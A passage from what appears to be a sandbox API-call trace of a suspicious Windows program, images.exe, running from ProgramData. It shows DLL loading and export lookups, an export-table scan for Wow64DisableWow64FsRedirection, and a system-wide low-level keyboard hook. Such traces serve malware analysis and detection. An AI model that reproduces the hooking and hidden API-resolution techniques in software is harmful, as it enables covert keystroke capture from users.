ProcedureAddress=0x41efe64*=0x74ca1bc0) returned 0x0 [0312.286] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetAtomNameW" | out: DestinationString="GetAtomNameW") [0312.286] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetAtomNameW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cad1a0) returned 0x0 [0312.286] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="AddAtomA" | out: DestinationString="AddAtomA") [0312.287] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="AddAtomA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74caff60) returned 0x0 [0312.287] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalAddAtomW" | out: DestinationString="GlobalAddAtomW") [0312.287] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalAddAtomW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca1be0) returned 0x0 [0312.287] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalFindAtomW" | out: DestinationString="GlobalFindAtomW") [0312.287] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalFindAtomW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca2110) returned 0x0 [0312.287] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="AddAtomW" | out: DestinationString="AddAtomW") [0312.287] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="AddAtomW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cacd30) returned 0x0 [0312.287] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetAtomNameA" | out: DestinationString="GetAtomNameA") [0312.287] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetAtomNameA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cc96f0) returned 0x0 [0312.287] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalGetAtomNameA" | out: DestinationString="GlobalGetAtomNameA") [0312.288] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalGetAtomNameA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cc9730) returned 0x0 [0312.288] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="DeleteAtom" | out: DestinationString="DeleteAtom") [0312.288] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="DeleteAtom", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cacb20) returned 0x0 [0312.288] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalDeleteAtom" | out: DestinationString="GlobalDeleteAtom") [0312.288] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalDeleteAtom", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca8bc0) returned 0x0 [0312.288] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalFindAtomA" | out: DestinationString="GlobalFindAtomA") [0312.288] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalFindAtomA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cad0c0) returned 0x0 [0312.288] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalGetAtomNameW" | out: DestinationString="GlobalGetAtomNameW") [0312.289] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalGetAtomNameW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca1f90) returned 0x0 [0312.289] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-heap-obsolete-l1-1-0.dll" | out: Destination="api-ms-win-core-heap-obsolete-l1-1-0.dll") returned 1 [0312.289] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-heap-obsolete-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.289] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalFlags" | out: DestinationString="GlobalFlags") [0312.289] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalFlags", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cae920) returned 0x0 [0312.289] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LocalSize" | out: DestinationString="LocalSize") [0312.289] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="LocalSize", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca80f0) returned 0x0 [0312.289] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalUnlock" | out: DestinationString="GlobalUnlock") [0312.289] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalUnlock", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca29f0) returned 0x0 [0312.289] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalLock" | out: DestinationString="GlobalLock") [0312.290] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalLock", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca23f0) returned 0x0 [0312.290] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalSize" | out: DestinationString="GlobalSize") [0312.290] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalSize", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca7720) returned 0x0 [0312.290] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalHandle" | out: DestinationString="GlobalHandle") [0312.290] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalHandle", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cae6e0) returned 0x0 [0312.290] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalReAlloc" | out: DestinationString="GlobalReAlloc") [0312.290] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalReAlloc", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca36b0) returned 0x0 [0312.290] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-string-obsolete-l1-1-0.dll" | out: Destination="api-ms-win-core-string-obsolete-l1-1-0.dll") returned 1 [0312.290] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-string-obsolete-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.290] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="lstrlenW" | out: DestinationString="lstrlenW") [0312.291] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="lstrlenW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca3690) returned 0x0 [0312.291] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="lstrlenA" | out: DestinationString="lstrlenA") [0312.291] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="lstrlenA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca8c80) returned 0x0 [0312.291] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="lstrcmpiW" | out: DestinationString="lstrcmpiW") [0312.291] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="lstrcmpiW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca7590) returned 0x0 [0312.291] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-localization-obsolete-l1-3-0.dll" | out: Destination="api-ms-win-core-localization-obsolete-l1-3-0.dll") returned 1 [0312.291] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-localization-obsolete-l1-3-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.291] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetStringTypeA" | out: DestinationString="GetStringTypeA") [0312.291] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetStringTypeA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b921f0) returned 0x0 [0312.292] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-stringansi-l1-1-0.dll" | out: Destination="api-ms-win-core-stringansi-l1-1-0.dll") returned 1 [0312.292] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-stringansi-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.292] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CharPrevExA" | out: DestinationString="CharPrevExA") [0312.292] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CharPrevExA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75bc2c20) returned 0x0 [0312.293] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-sidebyside-l1-1-0.dll" | out: Destination="api-ms-win-core-sidebyside-l1-1-0.dll") returned 1 [0312.293] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-sidebyside-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.293] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-kernel32-private-l1-1-1.dll" | out: Destination="api-ms-win-core-kernel32-private-l1-1-1.dll") returned 1 [0312.293] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-kernel32-private-l1-1-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.293] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-windowserrorreporting-l1-1-0.dll" | out: Destination="api-ms-win-core-windowserrorreporting-l1-1-0.dll") returned 1 [0312.293] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-windowserrorreporting-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.293] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="KERNELBASE.dll" | out: Destination="KERNELBASE.dll") returned 1 [0312.293] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNELBASE.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.294] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-kernel32-legacy-l1-1-1.dll" | out: Destination="api-ms-win-core-kernel32-legacy-l1-1-1.dll") returned 1 [0312.294] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-kernel32-legacy-l1-1-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.294] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-appinit-l1-1-0.dll" | out: Destination="api-ms-win-core-appinit-l1-1-0.dll") returned 1 [0312.294] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-appinit-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.294] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="GDI32.dll" | out: Destination="GDI32.dll") returned 1 [0312.294] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="GDI32.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x749b0000) returned 0x0 [0312.294] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-heap-l1-2-0.dll" | out: Destination="api-ms-win-core-heap-l1-2-0.dll") returned 1 [0312.294] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-heap-l1-2-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.295] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-processthreads-l1-1-3.dll" | out: Destination="api-ms-win-core-processthreads-l1-1-3.dll") returned 1 [0312.295] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-processthreads-l1-1-3.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.295] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-eventing-provider-l1-1-0.dll" | out: Destination="api-ms-win-eventing-provider-l1-1-0.dll") returned 1 [0312.295] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-eventing-provider-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.295] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-delayload-l1-1-1.dll" | out: Destination="api-ms-win-core-delayload-l1-1-1.dll") returned 1 [0312.295] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-delayload-l1-1-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.386] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x41efc68, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0312.386] RtlInitUnicodeString (in: DestinationString=0x41efc2c, SourceString="C:\\ProgramData\\images.exe" | out: DestinationString="C:\\ProgramData\\images.exe") [0312.392] NtUserSetWindowsHookEx (Mod=0x400000, UnsafeModuleName="C:\\ProgramData\\images.exe", ThreadId=0x0, HookId=13, HookProc=0x29f89c0, Ansi=1) returned 0x3014f [0312.400] GetMessageA (lpMsg=0x41efed4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 195 os_tid = 0xd90 [0312.138] GetCurrentProcess () returned 0xffffffff [0312.139] GetModuleHandleA (lpModuleName="kernel32") returned 0x74c90000 [0312.139] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0312.139] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x488fef8 | out: Wow64Process=0x488fef8*=1) returned 1 [0312.139] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="ActivateActCtx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddAtomA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddAtomW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddDllDirectory", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddRefActCtx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.139] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AllocConsole", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AreFileApisANSI", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="AttachConsole", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BackupRead", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BackupSeek", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BackupWrite", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseCheckElevation", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.140] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepAppXExtension", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.141] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepReportFault", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="Beep", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BuildCommDCBA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="BuildCommDCBW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CallNamedPipeA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CallNamedPipeW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CancelIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CancelIoEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CheckElevation", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.142] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CheckTokenCapability", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0312.143] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 